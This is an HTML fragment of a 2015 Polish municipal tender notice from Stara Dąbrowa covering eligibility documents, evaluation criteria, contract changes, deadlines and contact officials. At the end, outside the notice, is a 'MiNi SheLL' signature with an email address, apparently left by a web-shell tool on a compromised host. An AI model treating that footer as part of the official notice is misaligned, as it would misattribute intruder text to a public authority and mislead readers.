</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.wypełniony formularz ofertowy. 2. Oświadczenie o posiadaniu bazy magazynowo-transportowej. 3. Oświadczenie o posiadaniu wpisu do rejestru działalności regulowanej w zakresie odpadów komunalnych. 4. dokument potwierdzający wniesienie wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.95</li>
<li>2 - Europejski standart emisji spalin dla pojazdów z silnikiem wysokoprężnym lub benzynowym - 0.05</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień Umowy jest dopuszczalna w przypadku:
a)zaistnienia siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami lub obowiązującymi przepisami prawa,
b)zmiany obowiązującej wysokości podatku od towarów i usług w przypadku, gdy zmiana ta spowoduje zwiększenie lub zmniejszenie kosztów wykonania Umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia lub zmniejszenia wynagrodzenia należnego Wykonawcy o kwotę stanowiącą różnicę między nowo obowiązującą a dotychczasową wysokością podatku od towarów i usług, jednakże wyłącznie za okres po wejściu w życie zmiany jego wysokości. Zmiana postanowień Umowy z powyższych przyczyn może wpłynąć na zmianę wysokości wynagrodzenia, przy czym zwiększenie kwoty wynagrodzenia należnego Wykonawcy może nastąpić wyłącznie o kwotę wzrostu wysokości kosztów świadczenia usługi udokumentowanych przez Wykonawcę w związku ze zwyżką podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.staradabrowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Starej Dąbrowie 73-112 stara Dąbrowa 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2015 godzina 10:30, miejsce: Sekretariat (pokój nr 15) Urzędu gminy w starej Dąbrowie 73-112 Stara Dąbrowa 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Zamówienie publiczne nie jest finansowane ze środków Unii Europejskiej.2.  Do kontaktowania się z Wykonawcami Zamawiający upoważnia: 
- Krystiana Tylus - Podinspektora w Urzędzie Gminy w Starej Dąbrowie
 tel. 0-91 573 98 24, e-mail: bud@staradabrowa.pl - w zakresie procedury przetargowej,
-Mariusza Lasockiego - Inspektora w Urzędzie Gminy w Starej Dąbrowie
 tel. 0-91 573 98 33, e-mali: srodowisko@staradabrowa.pl - w zakresie zagadnienia przedmiotu zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com